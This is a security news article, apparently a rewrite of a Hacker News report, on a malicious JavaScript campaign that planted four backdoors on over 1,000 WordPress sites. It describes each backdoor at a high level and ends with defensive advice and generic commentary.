Over 1,000 WordPress Websites Infected with Multiple Backdoors via Malicious JavaScript

By /

Listen to this Post

A new cybersecurity threat has emerged as over 1,000 websites powered by WordPress have been compromised by a third-party JavaScript code that injects four distinct backdoors into the sites. The attack, which has been traced to a domain known for hosting malicious scripts, is rapidly expanding and represents a serious concern for WordPress site owners.

In this article, we will delve into the specifics of the attack, explore the functionality of the four backdoors, and provide recommended steps for mitigating the risks posed by this cyberattack. Additionally, we will take a closer look at how this threat aligns with broader trends in cybersecurity.

the Attack

The latest report reveals that over 1,000 WordPress websites have been infected with a third-party JavaScript code delivered through the domain cdn.csyndication[.]com. This code injects four separate backdoors into the websites, each offering attackers multiple points of entry. These backdoors are designed for various malicious purposes, including uploading fake plugins, injecting harmful code into important configuration files, enabling remote access through SSH keys, and executing remote commands.

The four backdoors are as follows:

  1. Backdoor 1: Installs a fake plugin called “Ultra SEO Processor” that allows attackers to execute commands remotely.
  2. Backdoor 2: Injects malicious JavaScript into the wp-config.php file, altering the website’s configuration for malicious purposes.
  3. Backdoor 3: Adds an attacker-controlled SSH key to the authorized keys file, enabling persistent remote access.
  4. Backdoor 4: Executes remote commands and downloads additional payloads, potentially opening a reverse shell on the compromised machine.

Experts recommend that affected users delete unauthorized SSH keys, rotate WordPress admin credentials, and carefully monitor system logs for suspicious activities. The discovery of this malware comes at a time when another large-scale malware campaign has compromised more than 35,000 websites, redirecting visitors to Chinese-language gambling platforms.

What Undercode Says:

The growing prevalence of website compromises, especially those involving WordPress, raises serious concerns about the security of widely-used platforms. WordPress continues to dominate as the most popular content management system, making it a prime target for cybercriminals. The fact that over 1,000 sites were compromised with such a sophisticated attack underlines the need for heightened security vigilance among WordPress users.

The technique of using multiple backdoors is not new, but it’s particularly alarming in this case due to the variety of attack vectors it introduces. Each backdoor serves a unique purpose, ensuring that if one is detected and removed, others can still facilitate the attackers’ persistent access. This approach significantly increases the complexity of identifying and mitigating the threat.

The malicious JavaScript code’s ability to exploit various vulnerabilities is a reminder that securing websites requires a multi-layered approach. The infection is not merely about exploiting known weaknesses but also relies on additional tactics such as injecting malicious code into critical files like wp-config.php and using SSH keys for remote access.

The scale of this attack is also concerning. Over 35,000 websites have already been affected by a separate malware campaign that hijacks users’ browsers, redirecting them to gambling sites. While both attacks originate from different malicious actors, they share a common theme: the use of JavaScript to carry out complex exploits. This type of malware often flies under the radar because it operates in the background, making it difficult for website administrators to detect.

What’s clear is that cybercriminals are evolving their techniques, taking advantage of vulnerabilities that may have been overlooked or underestimated. In many cases, website owners may not even be aware that their sites have been compromised, especially if the malware is simply lying in wait, ready to be activated when least expected.

Furthermore, as we see with the ScreamedJungle threat actor, attackers are increasingly leveraging browser fingerprinting techniques to track users and evade security measures. This type of information can be used to mimic legitimate behavior, making it even more difficult to detect fraudulent activities. It’s a reminder of how crucial it is for businesses to maintain strong website security and stay up-to-date on emerging threats.

In light of these threats, WordPress site owners should take proactive steps to harden their websites against attacks. This includes keeping plugins and themes updated, using strong, unique passwords, regularly scanning for vulnerabilities, and employing additional layers of security, such as two-factor authentication (2FA) and Web Application Firewalls (WAF).

Fact Checker Results:

  • Backdoor Identification: The identified backdoors serve distinct roles and can lead to significant risks, including unauthorized command execution, remote access, and data exfiltration.
  • Increased Attack Frequency: The scale of these attacks is part of a growing trend in targeting WordPress websites, which continues to be a top target due to its widespread use.
  • Gambling Redirection Malware: The campaign redirecting users to gambling sites highlights the broader trend of cybercriminals monetizing compromised websites through redirections and other fraudulent schemes.

References:

Reported By: https://thehackernews.com/2025/03/over-1000-wordpress-sites-infected-with.html
Extra Source Hub:
https://www.medium.com
Wikipedia: https://www.wikipedia.org
Undercode AI

Image Source:

OpenAI: https://craiyon.com
Undercode AI DI v2

Join Our Cyber World:

Whatsapp
TelegramFeatured Image

Explore More: